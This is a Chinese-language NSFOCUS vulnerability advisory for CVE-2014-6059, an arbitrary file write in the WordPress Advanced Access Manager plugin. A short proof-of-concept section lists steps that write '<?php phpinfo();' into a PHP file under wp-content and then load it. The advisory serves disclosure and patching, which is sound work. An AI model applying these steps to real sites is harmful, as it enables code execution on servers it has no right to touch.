NSFOCUS绿盟科技

首页 -> 安全研究

安全研究

安全漏洞

WordPress Advanced Access Manager插件任意文件覆盖漏洞（CVE-2014-6059）

发布日期：2014-09-03
更新日期：2014-09-04

受影响系统：

WordPress Advanced Access Manager 2.8.2
WordPress Advanced Access Manager

描述：

BUGTRAQ ID: 69549
CVE(CAN) ID: CVE-2014-6059

Advanced Access Manager插件是访问控制和安全增强工具，可对单个博客或多站点网络进行灵活的控制。

Advanced Access Manager 2.8.2及其他版本允许对任意文件写入任意内容，根据服务器配置，这有可能导致任意代码执行、覆盖核心文件或者上传目录内的文件。

<*来源：Tom Adams
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Visit http://localhost/wp-admin/admin.php?page=aam-configpress
Press “Save” (this creates the “aam_configpress” option)
Visit http://localhost/wp-admin/options.php
Set “aam_configpress” to “test.php”
Press “Save Changes”
Visit http://localhost/wp-admin/admin.php?page=aam-configpress again
Enter “<?php phpinfo();” into the textarea (without the quotes)
Press “Save”
Visit http://localhost/wp-content/aam/test.php

建议：

厂商补丁：

WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

https://wordpress.org/plugins/advanced-access-manager/

浏览次数：26489
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客